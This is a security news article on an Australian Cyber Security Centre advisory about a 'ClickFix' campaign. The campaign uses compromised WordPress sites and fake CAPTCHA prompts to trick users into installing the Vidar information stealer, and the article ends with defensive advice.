ClickFix Campaign Uses Compromised WordPress Sites to Spread Vidar Stealer in Australia

Cybercriminals are increasingly relying on social engineering instead of traditional exploits, and Australian authorities are warning that a spreading “ClickFix” campaign is a prime example.

The Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) has issued an advisory about an ongoing malware campaign targeting Australian infrastructure and organizations through compromised WordPress websites. The attacks use fake CAPTCHA or Cloudflare verification prompts to trick users into infecting their own systems with Vidar Stealer malware.

Key takeaways

• The ACSC is warning that threat actors are using compromised WordPress sites to distribute Vidar Stealer malware.
• The campaign relies on the “ClickFix” social engineering technique, which tricks users into manually executing malicious commands.
• Victims are shown fake Cloudflare or CAPTCHA verification pages that copy malware commands to the clipboard.
• Vidar Stealer targets passwords, browser cookies, cryptocurrency wallets, and other sensitive information.
• ClickFix campaigns are spreading rapidly because they bypass many traditional security controls by exploiting user trust instead of software vulnerabilities.

What is ClickFix?

ClickFix is a relatively new social engineering tactic that has gained traction among cybercriminals over the past two years. Instead of silently exploiting vulnerabilities, attackers persuade users to run malicious commands themselves.

Typically, victims encounter a fake verification page masquerading as a CAPTCHA, browser check, or Cloudflare protection screen. The page instructs users to copy and paste a command into Windows Run, PowerShell, or Terminal to “verify” they are human or resolve a supposed technical issue.

In the campaign flagged by the ACSC, attackers compromised legitimate Australian WordPress websites and injected them with malicious JavaScript. Once users visit the sites, they are redirected to fake verification prompts that deliver the malware chain.

Microsoft has warned that ClickFix attacks have become increasingly popular because they rely on “human intervention” rather than traditional malware delivery techniques, helping attackers evade some automated defenses.

Vidar Stealer remains a major threat

The payload delivered in this campaign is Vidar Stealer, a malware-as-a-service (MaaS) information stealer active since 2018.

Vidar is designed to harvest:

• Saved browser credentials
• Session cookies
• Cryptocurrency wallet data
• Autofill information
• System details
• Files from infected devices

The malware is especially dangerous because stolen browser session cookies sometimes let attackers bypass passwords and even multi-factor authentication sessions. Once collected, the data is typically sold on cybercrime marketplaces or used in follow-on attacks.

According to the ACSC, Vidar tries to reduce forensic traces by deleting its executable after launching and operating primarily in memory. The malware retrieves command-and-control infrastructure through “dead-drop” resolvers hosted on legitimate services such as Telegram bots and Steam profiles.

Compromised WordPress sites are fueling the campaign

Security researchers have observed a broader global trend involving the weaponization of compromised WordPress sites to deliver ClickFix malware.

Researchers said they identified more than 250 infected websites across at least 12 countries, including Australia, the United States, the United Kingdom, Germany, and Canada. Many of the sites belonged to legitimate businesses and organizations, increasing the credibility of the malicious prompts shown to visitors.

Attackers may be gaining access through stolen administrator credentials, exposed admin panels, vulnerable plugins, or weak password protections. The scale and automation of the campaign point to an organized criminal operation rather than opportunistic attackers.

Why these attacks work so well

ClickFix attacks exploit something security tools often struggle to detect: user behavior.

Instead of downloading a malicious attachment or exploiting a browser vulnerability, the victim willingly executes the malicious command. That makes the activity look more legitimate and can help attackers bypass security filters and endpoint protections.

The fake CAPTCHA and Cloudflare prompts also capitalize on familiarity. People encounter verification checks constantly online, making the malicious requests appear routine and trustworthy.

How to stay safe

Organizations and individuals should treat any website asking them to manually run commands on their systems as a major red flag.

Security experts recommend users:

• Never copy and run commands from websites you don’t fully trust
• Keep WordPress installations, plugins, and themes fully updated
• Use strong, unique passwords and enable multi-factor authentication for admin accounts
• Restrict PowerShell and scripting tools where possible
• Train employees to recognize fake CAPTCHA and verification prompts
• Use layered security solutions that can detect infostealers and suspicious behavior

Because info-stealing malware is designed to silently harvest credentials and session tokens, early detection is critical. A modern security solution with anti-phishing, web protection, and behavioral threat detection can help stop these attacks before sensitive data is compromised.

You may also want to read:

The Scam That Tricks You Into Infecting Your Own Mac

Four Years in Prison for Cybersecurity Pros Turned Ransomware Attackers

FBI: Cybercrime Losses Hit a Record $21 Billion Last Year, Fueled by AI